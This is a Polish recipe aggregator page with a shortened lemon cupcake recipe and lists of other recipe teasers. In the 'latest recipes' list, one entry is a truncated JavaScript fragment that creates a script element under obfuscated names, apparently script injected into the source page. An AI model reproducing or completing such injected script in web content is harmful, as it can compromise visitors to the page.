Babaczki cytrynowe z polewą lukrową
Źródło: https://lena-gotuje.blogspot.com/2022/04/babaczki-cytrynowe-z-polewa-lukrowa.html
Szybkie babeczki cytrynowe, pięknie pachnące, wilgotne i idealnie słodkie.Składniki:szklanka mąki,3 jajka M,łyżeczka proszku do pieczeniałyżka cukru pudru + pół szklankiopakowanie cukru ze skórką cytrynową,skórka z jednej średniej wielkości cytryny,2-3 łyżki soku z cytryny, pół szklanki oleju,1/3 szklanki mleka,szczypta soli.Przygotowanie:W jednej misce mieszamy...
Najnowsze przepisy
Śledzie gajowego z suszonymi borowikami (po myśliwsku)Są... ⇖ 9
(function(){ ak45=document.createElement("script");ak45_="o" ⇖ 8
Batat z pieca, lekko przypieczony na krawędziach i kremowy... ⇖ 18
Domowy chleb z ziarnami – puszysty, aromatyczny i idealny... ⇖ 13
Serniki z PodkarpaciaPrzeglądając podkarpackie przepisy... ⇖ 21
Przepisy z bloga
Kanapka na ciepło z kiełbasą, cebulą, usmażona w jajku... ⇖ 27
Mrożonkę z zupy kalafiorowej FRoSTA można wykorzystać w... ⇖ 60
Zimne nóżki drobiowe lub galareta drobiowa. Pyszne... ⇖ 68
Pomysł na szybki, łatwy i przepyszny obiad czyli makaron... ⇖ 68
Szybka sałatka makaronowa z filetem z kurczaka, kolorowymi... ⇖ 92
Pyszna chrupiąca grzanka z niesamwicie kremowym pesto... ⇖ 82
Sernik bez spodu z dodatkiem prażonych jabłek na wierzchu... ⇖ 66
Pyszne danie jednogarnkowe z dynią, marchewką i papryką.... ⇖ 101
Danie, które lubię jeść na obiad - makaron w wersji... ⇖ 71
Przepisy na czasie
Masz ochotę na coś słodkiego bez pieczenia? Zrób sernik... ⇖ 1811
Piernik przekładany kremem to jedno z tych ciast, które... ⇖ 1189
To niezwykle proste ciasto piernikowe, które zawsze się... ⇖ 696
NAJLEPSZY PRZEPIS NA CIASTO NA PIEROŻKIBardzo lubię... ⇖ 684
Cześć! Dzisiaj robimy ciasto lion bez pieczenia, to... ⇖ 614
Sernik łaciaty z brzoskwiniami i makiem to ciasto, które... ⇖ 603
Kremowe, delikatne ciasto z białą czekoladą i cukierkami... ⇖ 566
Przepyszny domowy pasztet do smarowania. W sklepie tak... ⇖ 490
Pyszny, mięciutki i delikatny. Idealne na półmisek... ⇖ 481
Paszteciki z mięsem, z ciasta drożdżowo-kruchego to... ⇖ 466








































